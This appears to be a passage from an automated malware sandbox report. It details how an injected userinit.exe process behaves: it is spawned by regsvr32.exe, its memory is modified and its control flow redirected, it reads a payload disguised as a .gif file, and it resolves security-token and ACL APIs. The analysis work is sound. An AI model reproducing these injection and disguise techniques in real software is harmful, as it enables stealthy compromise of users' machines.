Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1708015	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #43: userinit.exe

222

0

»

Information	Value
ID	#43
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:37, Reason: Child Process
Unmonitor	End Time: 00:02:41, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x710
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 6F8 0x 838 0x 83C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00217fff	Pagefile Backed Memory	r	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rwx	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00240000	0x00240fff	Memory Mapped File	r	-
private_0x0000000000270000	0x00270000	0x0027ffff	Private Memory	rw	-
pagefile_0x0000000000280000	0x00280000	0x00380fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	-	-
private_0x0000000000570000	0x00570000	0x005fffff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0063ffff	Private Memory	rw	-
private_0x0000000000660000	0x00660000	0x0075ffff	Private Memory	rw	-
private_0x0000000000760000	0x00760000	0x0091ffff	Private Memory	rw	-
pagefile_0x0000000000760000	0x00760000	0x0083efff	Pagefile Backed Memory	r	-
private_0x0000000000840000	0x00840000	0x008bffff	Private Memory	rw	-
private_0x00000000008e0000	0x008e0000	0x0091ffff	Private Memory	rw	-
pagefile_0x0000000000920000	0x00920000	0x00d12fff	Pagefile Backed Memory	r	-
userinit.exe	0x00d80000	0x00d88fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d90000	0x00d90000	0x0198ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01990000	0x022bffff	Memory Mapped File	r	-
private_0x00000000022c0000	0x022c0000	0x023ccfff	Private Memory	rw	-
private_0x00000000023d0000	0x023d0000	0x024cffff	Private Memory	rw	-
private_0x00000000024d0000	0x024d0000	0x026cffff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02750fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02754fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02758fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0275cfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02762fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02766fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0276afff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0276efff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02774fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02778fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0277cfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02782fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02786fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0278afff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0278efff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02794fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02798fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0279cfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027a2fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027aafff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027aefff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027b4fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027b8fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027bcfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027c2fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027c6fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027cafff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027cefff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027d4fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027d8fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027dcfff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x027e2fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x027e6fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x027eafff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x027eefff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02804fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02808fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x0280cfff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02810fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02826fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0282afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0282efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02844fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02848fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0284cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02850fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02866fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0286afff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0286efff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02884fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02888fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x0288cfff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02890fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028aafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028aefff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028c4fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028c8fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028ccfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d0fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028eafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028effff	Private Memory	-	-
private_0x00000000027f0000	0x027f0000	0x02880fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028c2fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028e0fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02922fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02940fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02982fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x029a0fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029e2fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x02a02fff	Private Memory	rwx	-
private_0x0000000002a10000	0x02a10000	0x02b0ffff	Private Memory	-	-
private_0x0000000002c30000	0x02c30000	0x02d2ffff	Private Memory	rw	-
private_0x0000000002d80000	0x02d80000	0x02dbffff	Private Memory	rw	-
sortdefault.nls	0x02dc0000	0x0308efff	Memory Mapped File	r	-
olepro32.dll	0x6d770000	0x6d788fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd5008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x6f8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d770000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = äð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7720ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7720b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7720c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7720d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
